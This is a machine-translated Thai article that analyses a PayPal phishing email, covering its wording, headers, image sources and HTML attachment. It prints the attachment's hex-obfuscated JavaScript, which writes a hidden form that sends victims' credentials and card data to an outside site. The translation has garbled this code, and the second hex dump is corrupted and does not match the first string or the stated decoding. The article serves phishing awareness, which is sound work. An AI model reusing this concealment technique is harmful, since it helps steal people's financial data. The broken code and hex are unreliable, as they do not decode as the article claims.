การรักษาความปลอดภัยออนไลน์: การทำลายโครงสร้างของอีเมลฟิชชิ่ง

Jun 25, 2025
ความเป็นส่วนตัวและความปลอดภัย
เนื้อหาที่ไม่ถูกแคช


ในโลกปัจจุบันที่ข้อมูลของทุกคนอยู่ในโลกออนไลน์ฟิชชิงเป็นหนึ่งในการโจมตีออนไลน์ที่ได้รับความนิยมและร้ายแรงที่สุดเพราะคุณสามารถกำจัดไวรัสได้ตลอดเวลา แต่หากรายละเอียดธนาคารของคุณถูกขโมยคุณก็กำลังมีปัญหา นี่คือรายละเอียดของการโจมตีที่เราได้รับ

อย่าคิดว่ามันเป็นเพียงรายละเอียดการธนาคารของคุณเท่านั้นที่มีความสำคัญหากมีใครบางคนสามารถควบคุมการเข้าสู่ระบบบัญชีของคุณได้พวกเขาไม่เพียง แต่รู้ข้อมูลที่อยู่ในบัญชีนั้นเท่านั้น แต่ยังมีโอกาสที่ข้อมูลการเข้าสู่ระบบเดียวกันอาจถูกนำไปใช้กับข้อมูลอื่น ๆ บัญชี และหากพวกเขาบุกรุกบัญชีอีเมลของคุณพวกเขาสามารถรีเซ็ตรหัสผ่านอื่น ๆ ทั้งหมดของคุณได้

ดังนั้นนอกเหนือจากการรักษารหัสผ่านที่รัดกุมและแตกต่างกันแล้วคุณยังต้องคอยระวังอีเมลปลอมที่ปลอมแปลงเป็นของจริงเสมอ แม้ว่าความพยายามในการฟิชชิงส่วนใหญ่จะเป็นแบบมือสมัครเล่น แต่บางอย่างก็ค่อนข้างน่าเชื่อดังนั้นจึงเป็นสิ่งสำคัญที่จะต้องเข้าใจวิธีการจดจำพวกเขาในระดับพื้นผิวรวมถึงวิธีการทำงานภายใต้ประทุน

ภาพโดย asirap

การตรวจสอบสิ่งที่อยู่ในสายตาธรรมดา

อีเมลตัวอย่างของเราเช่นเดียวกับการพยายามฟิชชิงส่วนใหญ่ "แจ้ง" ให้คุณทราบถึงกิจกรรมในบัญชี PayPal ของคุณซึ่งอาจเป็นเรื่องที่น่าตกใจ ดังนั้นคำกระตุ้นการตัดสินใจคือการยืนยัน / กู้คืนบัญชีของคุณโดยการส่งข้อมูลส่วนบุคคลทั้งหมดที่คุณคิดได้ อีกครั้งนี่เป็นสูตรที่สวย

แม้ว่าจะมีข้อยกเว้นอย่างแน่นอน แต่เกือบทุกอีเมลฟิชชิ่งและสแกมจะเต็มไปด้วยแฟล็กสีแดงในข้อความโดยตรง แม้ว่าข้อความจะน่าเชื่อถือ แต่โดยปกติแล้วคุณจะพบข้อผิดพลาดมากมายที่ทิ้งกระจุยกระจายทั่วเนื้อหาข้อความซึ่งแสดงว่าข้อความนั้นไม่ถูกต้องตามกฎหมาย

เนื้อหาข้อความ

แวบแรกนี่เป็นหนึ่งในอีเมลฟิชชิ่งที่ดีกว่าที่ฉันเคยเห็น ไม่มีข้อผิดพลาดในการสะกดคำหรือไวยากรณ์และคำอ่านออกเสียงตามสิ่งที่คุณคาดหวัง อย่างไรก็ตามมีธงสีแดงสองสามอันที่คุณสามารถเห็นได้เมื่อคุณตรวจสอบเนื้อหาอย่างละเอียดมากขึ้น

  • “ Paypal” - กรณีที่ถูกต้องคือ“ PayPal” (ตัวพิมพ์ใหญ่ P) คุณสามารถเห็นทั้งสองรูปแบบที่ใช้ในข้อความ บริษัท ต่างๆมีความตั้งใจอย่างมากกับการสร้างตราสินค้าดังนั้นจึงเป็นเรื่องที่น่าสงสัยเช่นนี้จะผ่านกระบวนการพิสูจน์
  • “ อนุญาตให้ใช้งาน ActiveX” - กี่ครั้งแล้วที่คุณเห็นธุรกิจบนเว็บที่ถูกกฎหมายขนาดของ Paypal ใช้องค์ประกอบที่เป็นกรรมสิทธิ์ซึ่งใช้งานได้บนเบราว์เซอร์เดียวเท่านั้นโดยเฉพาะอย่างยิ่งเมื่อรองรับหลายเบราว์เซอร์ แน่นอนว่ามีบาง บริษัท ทำ แต่นี่คือธงสีแดง
  • “ อย่างปลอดภัย” - สังเกตว่าคำนี้ไม่อยู่ในแนวขอบกับส่วนที่เหลือของข้อความย่อหน้า แม้ว่าฉันจะยืดหน้าต่างออกไปอีกเล็กน้อย แต่ก็ไม่ได้ห่อหุ้มหรือเว้นช่องว่างอย่างถูกต้อง
  • “ Paypal!” - ช่องว่างก่อนเครื่องหมายตกใจดูน่าอึดอัด อีกมุมมองหนึ่งที่ฉันแน่ใจว่าจะไม่อยู่ในอีเมลที่ถูกต้อง
  • “ PayPal- Account Update Form.pdf.htm” - เหตุใด Paypal จึงต้องแนบ“ PDF” โดยเฉพาะอย่างยิ่งเมื่อพวกเขาสามารถเชื่อมโยงไปยังหน้าบนเว็บไซต์ได้ นอกจากนี้เหตุใดพวกเขาจึงพยายามปลอมไฟล์ HTML เป็น PDF นี่คือธงสีแดงที่ใหญ่ที่สุดของพวกเขาทั้งหมด

ส่วนหัวของข้อความ

เมื่อคุณดูที่ส่วนหัวของข้อความจะมีธงสีแดงปรากฏขึ้นสองสามอัน

  • ที่อยู่จากคือ [email protected] .
  • ที่อยู่ไปยังขาดหายไป ฉันไม่ได้เว้นว่างไว้ แต่ไม่ได้เป็นส่วนหนึ่งของส่วนหัวของข้อความมาตรฐาน โดยทั่วไปแล้ว บริษัท ที่มีชื่อของคุณจะปรับแต่งอีเมลให้เหมาะกับคุณ

สิ่งที่แนบมา

เมื่อฉันเปิดสิ่งที่แนบมาคุณจะเห็นได้ทันทีว่าเค้าโครงไม่ถูกต้องเนื่องจากไม่มีข้อมูลสไตล์ อีกครั้งทำไม PayPal ถึงส่งอีเมลในรูปแบบ HTML ในเมื่อพวกเขาสามารถให้ลิงก์บนไซต์ของพวกเขาได้

บันทึก: เราใช้โปรแกรมดูไฟล์แนบ HTML ในตัวของ Gmail แต่ขอแนะนำว่าอย่าเปิดไฟล์แนบจากนักต้มตุ๋น ไม่เลย เคย. พวกเขามักจะมีช่องโหว่ที่จะติดตั้งโทรจันบนพีซีของคุณเพื่อขโมยข้อมูลบัญชีของคุณ

เลื่อนลงมาอีกนิดคุณจะเห็นว่าแบบฟอร์มนี้ไม่เพียงขอข้อมูลการเข้าสู่ระบบ PayPal ของเราเท่านั้น แต่ยังรวมถึงข้อมูลธนาคารและบัตรเครดิตด้วย บางส่วนของภาพแตก

เห็นได้ชัดว่าการพยายามฟิชชิงนี้เกิดขึ้นหลังจากการโจมตีเพียงครั้งเดียว

รายละเอียดทางเทคนิค

แม้ว่ามันจะค่อนข้างชัดเจนจากสิ่งที่เห็นได้ชัดว่านี่เป็นความพยายามในการฟิชชิง แต่ตอนนี้เรากำลังจะแยกองค์ประกอบทางเทคนิคของอีเมลและดูว่าเราสามารถหาอะไรได้บ้าง

ข้อมูลจากเอกสารแนบ

สิ่งแรกที่ต้องพิจารณาคือแหล่งที่มา HTML ของแบบฟอร์มไฟล์แนบซึ่งเป็นสิ่งที่ส่งข้อมูลไปยังไซต์ปลอม

เมื่อดูแหล่งที่มาอย่างรวดเร็วลิงก์ทั้งหมดจะปรากฏที่ถูกต้องเมื่อชี้ไปที่“ paypal.com” หรือ“ paypalobjects.com” ซึ่งทั้ง

ตอนนี้เราจะมาดูข้อมูลพื้นฐานของหน้าเว็บที่ Firefox รวบรวมไว้ในหน้า

อย่างที่คุณเห็นกราฟิกบางส่วนถูกดึงมาจากโดเมน“ blessedtobe.com”,“ goodhealthpharmacy.com” และ“ pic-upload.de” แทนที่จะเป็นโดเมน PayPal ที่ถูกต้อง

ข้อมูลจากส่วนหัวอีเมล

ต่อไปเราจะดูส่วนหัวของข้อความอีเมลดิบ Gmail ทำให้สามารถใช้งานได้ผ่านทางตัวเลือกแสดงเมนูต้นฉบับบนข้อความ

เมื่อดูข้อมูลส่วนหัวของข้อความต้นฉบับคุณจะเห็นว่าข้อความนี้ถูกสร้างขึ้นโดยใช้ Outlook Express 6 ฉันสงสัยว่า PayPal มีพนักงานที่ส่งแต่ละข้อความเหล่านี้ด้วยตนเองผ่านโปรแกรมรับส่งอีเมลที่ล้าสมัย

ตอนนี้ดูข้อมูลการกำหนดเส้นทางเราจะเห็นที่อยู่ IP ของทั้งผู้ส่งและเซิร์ฟเวอร์อีเมลที่ส่งต่อ

ที่อยู่ IP“ ผู้ใช้” เป็นผู้ส่งดั้งเดิม ทำการค้นหาข้อมูล IP อย่างรวดเร็วเราจะเห็นว่า IP ที่ส่งอยู่ในเยอรมนี

และเมื่อเราดูเซิร์ฟเวอร์อีเมลที่ส่งต่อ (mail.itak.at) ที่อยู่ IP เราจะเห็นว่านี่คือ ISP ที่อยู่ในออสเตรีย ฉันสงสัยว่า PayPal กำหนดเส้นทางอีเมลโดยตรงผ่าน ISP ในออสเตรียเมื่อพวกเขามีเซิร์ฟเวอร์ฟาร์มขนาดใหญ่ซึ่งสามารถจัดการงานนี้ได้อย่างง่ายดาย

ข้อมูลไปที่ไหน

ดังนั้นเราจึงได้พิจารณาอย่างชัดเจนว่านี่เป็นอีเมลฟิชชิงและรวบรวมข้อมูลบางอย่างเกี่ยวกับที่มาของข้อความ แต่ข้อมูลของคุณจะถูกส่งไปที่ใด

ในการดูสิ่งนี้เราต้องบันทึกไฟล์แนบ HTM ก่อนจากเดสก์ท็อปของเราและเปิดในโปรแกรมแก้ไขข้อความ เมื่อเลื่อนดูทุกอย่างดูเหมือนจะเป็นไปตามลำดับยกเว้นเมื่อเราไปที่บล็อก Javascript ที่ดูน่าสงสัย

เราเห็นแหล่งที่มาทั้งหมดของบล็อกสุดท้ายของ Javascript:

<script language =” JavaScript” type =” text / javascript”>
// ลิขสิทธิ์© 2005 Voormedia - WWW.VOORMEDIA.COM
var ฉัน, y, x =” 3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; Y =” สำหรับ (i = 0; ฉัน <x.length; i + = 2) {y+=unescape(‘%’+x.substr(i,2));}document.write (y);
</script>

เมื่อใดก็ตามที่คุณเห็นสตริงตัวอักษรและตัวเลขสุ่มที่ดูเหมือนสุ่มขนาดใหญ่ฝังอยู่ในบล็อก Javascript มักเป็นสิ่งที่น่าสงสัย เมื่อดูโค้ดตัวแปร“ x” จะถูกตั้งค่าเป็นสตริงขนาดใหญ่นี้จากนั้นจึงถอดรหัสเป็นตัวแปร“ y” ผลลัพธ์สุดท้ายของตัวแปร“ y” จะถูกเขียนลงในเอกสารเป็น HTML

เนื่องจากสตริงขนาดใหญ่ประกอบด้วยตัวเลข 0-9 และตัวอักษร a-f จึงมีแนวโน้มที่จะเข้ารหัสผ่านการแปลง ASCII เป็น Hex อย่างง่าย:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f2f7777772e64657870626f737267327f2e64657870626f737267327f2e646578706f73726732742f73742220616374696f6e3d22687474703a2f2f2f7777772e646578706f737267327f57e646578703a2f2f2f7777772f57706

แปลเป็น:

<form name =” main” id =” main” method =” post” action =” http://www.dexposure.net/bbs/data/verify.php”>

ไม่ใช่เรื่องบังเอิญที่สิ่งนี้ถอดรหัสเป็นแท็กรูปแบบ HTML ที่ถูกต้องซึ่งส่งผลลัพธ์ไม่ไปที่ PayPal แต่ส่งไปยังไซต์ที่หลอกลวง

นอกจากนี้เมื่อคุณดูซอร์ส HTML ของฟอร์มคุณจะเห็นว่าไม่สามารถมองเห็นแท็กฟอร์มนี้ได้เนื่องจากแท็กถูกสร้างขึ้นแบบไดนามิกผ่าน Javascript นี่เป็นวิธีที่ชาญฉลาดในการซ่อนสิ่งที่ HTML กำลังทำอยู่หากมีคนเพียงแค่ดูแหล่งที่มาของไฟล์แนบที่สร้างขึ้น (อย่างที่เราทำก่อนหน้านี้) ซึ่งต่างจากการเปิดไฟล์แนบโดยตรงในโปรแกรมแก้ไขข้อความ

การเรียกใช้ whois อย่างรวดเร็วในไซต์ที่กระทำผิดเราจะเห็นว่านี่คือโดเมนที่โฮสต์อยู่ที่โฮสต์เว็บยอดนิยม 1and1

สิ่งที่โดดเด่นคือโดเมนใช้ชื่อที่อ่านได้ (ตรงข้ามกับบางอย่างเช่น“ dfh3sjhskjhw.net”) และโดเมนได้รับการจดทะเบียนเป็นเวลา 4 ปี ด้วยเหตุนี้ฉันจึงเชื่อว่าโดเมนนี้ถูกไฮแจ็คและถูกใช้เป็นเบี้ยในการพยายามฟิชชิงนี้

การดูถูกเหยียดหยามเป็นการป้องกันที่ดี

เมื่อพูดถึงการออนไลน์อย่างปลอดภัยมันไม่เคยเจ็บเลยที่จะมีการดูถูกเหยียดหยามที่ดี

แม้ว่าฉันแน่ใจว่ามีธงสีแดงเพิ่มเติมในอีเมลตัวอย่าง แต่สิ่งที่เราได้ชี้ให้เห็นข้างต้นเป็นตัวบ่งชี้ที่เราเห็นหลังจากการตรวจสอบเพียงไม่กี่นาที สมมุติฐานหากระดับพื้นผิวของอีเมลเลียนแบบคู่สัญญาที่ถูกต้อง 100% การวิเคราะห์ทางเทคนิคจะยังคงเปิดเผยลักษณะที่แท้จริง ด้วยเหตุนี้การนำเข้าจึงสามารถตรวจสอบทั้งสิ่งที่คุณมองเห็นและมองไม่เห็น

Breaking Bad Security Tutorial 1 - Email Phishing

Anatomy Of Phishing Campaigns: A Gmail Perspective

How To Identify A Phishing Email

[CYBER FRIGHT] Anatomy Of A Phishing Email

Security Awareness Quick Tip: How To Identify And Avoid Email Phishing Scams - Part 1

Cyber Security & Phishing

Understanding Anatomy Of Phishing Attack

Anatomy Of A Phishing Attack With DNSFilter

8th PPO-SA Webinar: Cyber Security: Beware Of Phishing Attach!

Cybersecurity Training How To Spot A Phishing Email

The Truth About Phishing: It Only Takes One

Anatomy Of Scam Emails - How To Recognise A Phishing Scam Message

Phishing Attack Example - How To Spot A Scam Email

What Is Phishing?

How To Spot A Phishing Fraud Email - Fun With Phishing | Tech Tip Tuesday

Hands-on Computer Security & Incident Response -- Email Header Analysis Part 1

Anatomy Of A Spearphishing Attack


ความเป็นส่วนตัวและความปลอดภัย - บทความยอดนิยม

วิธีเปลี่ยนปุ่ม Echo เป็นปุ่ม Home Lockdown

ความเป็นส่วนตัวและความปลอดภัย Nov 21, 2024

เนื้อหาที่ไม่ถูกแคช ปุ่มก้องเป็นอุปกรณ์บลูทู ธ ธรรมดาที่เชื่อ�..


วิธีซ่อนที่อยู่ IP ของคุณ (และทำไมคุณอาจต้องการ)

ความเป็นส่วนตัวและความปลอดภัย Jun 18, 2025

ของคุณ ที่อยู่ IP เปรียบเสมือนรหัสสาธารณะของคุณบนอินเทอร์เน็ต..


“ Runtime Broker” คืออะไรและเหตุใดจึงทำงานบนพีซีของฉัน

ความเป็นส่วนตัวและความปลอดภัย Jul 18, 2025

หากคุณกำลังอ่านบทความนี้คุณอาจเห็นกระบวนการ Runtime Broker ในไฟล์ ..


วิธีตั้งค่าการรับรองความถูกต้องด้วยสองปัจจัยสำหรับ Apple ID ของคุณ

ความเป็นส่วนตัวและความปลอดภัย Jun 8, 2025

การรับรองความถูกต้องด้วยสองปัจจัย เพิ่มความปลอดภัยอีกชั้น..


วิธีการใช้รหัสผ่านป้องกันเอกสารและ PDF ด้วย Microsoft Office

ความเป็นส่วนตัวและความปลอดภัย May 28, 2025

Microsoft Office ช่วยให้คุณเข้ารหัสเอกสาร Office และไฟล์ PDF ทำให้ไม่มีใครสามารถ�..


วิธีล้างประวัติการเรียกดูและคุกกี้ของ Safari บน OS X

ความเป็นส่วนตัวและความปลอดภัย Feb 17, 2025

คุณอาจไม่มีอะไรต้องซ่อนเมื่อเราท่องอินเทอร์เน็ต แต่คุณอาจต้อง..


สร้างทางลัดเพื่อหลีกเลี่ยงป๊อปอัปการควบคุมบัญชีผู้ใช้ด้วยวิธีง่ายๆ

ความเป็นส่วนตัวและความปลอดภัย Mar 20, 2025

เนื้อหาที่ไม่ถูกแคช มีแอพพลิเคชั่นมากมายที่เมื่อเปิดใช้งานจะ�..


ปิดใช้งานและลบไซต์ที่แนะนำออกจาก Internet Explorer 8

ความเป็นส่วนตัวและความปลอดภัย Jan 26, 2025

เนื้อหาที่ไม่ถูกแคช หากคุณเป็นผู้ใช้ Internet Explorer 8 ไม่ว่าจะโดยการเลือกห�..


หมวดหมู่